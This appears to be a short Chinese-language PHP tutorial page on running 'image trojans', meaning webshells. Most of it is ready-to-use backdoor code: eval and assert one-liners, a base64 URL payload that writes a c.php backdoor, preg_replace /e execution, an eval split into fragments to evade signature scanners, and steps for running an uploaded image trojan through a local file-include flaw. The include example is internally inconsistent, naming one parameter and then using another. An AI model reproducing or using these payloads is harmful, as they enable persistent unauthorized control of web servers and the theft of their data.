php圖片木馬怎麼運行

PHP圖片木馬的運行方法

#1、標準的寫法,直接透過eval執行php程式碼

@eval ($_POST['code']);

2、動態執行assert產生一個木馬檔案(隱藏性最好的一種)

@$_GET['a']($_GET['code']);

3、使用方法:從url中傳入下面參數執行後會在目前目錄產生一個c.php的檔案

/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,
base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

a參數為eval時會報錯(因為eval不是函數)木馬產生失敗，為assert時同樣報錯，但會生成木馬。

4、使用preg_replace執行程式碼(裡面前面只要用一個的任意字串就可以,如果不一樣的話命令可能會被執行多次)

@preg_replace("/re/e", $_POST['code'], "re");

5、把特徵碼打散

session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

6、重新命名任意檔案

$reg="c"."o"."p"."y";
$reg($_FILES['filename']['tmp_name'],$_FILES['filename']['name']);

include的漏洞使用方法

有時候我們會上傳一些圖片木馬但是卻不能執行,這個時候如果有一個include的漏洞,那麼圖片木馬就可以執行啦。

如果php程式碼裡有一個include($_GET['controller']) 且還有一個url路徑為：/index.php?controller=user，這個看起來就是一個根據參數包含執行對應控制器的程式碼，但是如果url路徑裡的參數改成這樣：/index.php?uid=/upload/images/muma.jpg，這時候木馬就執行啦。

以上內容僅供參考！

推薦教學：PHP影片教學

#

以上是php圖片木馬怎麼運行的詳細內容。更多資訊請關注PHP中文網其他相關文章！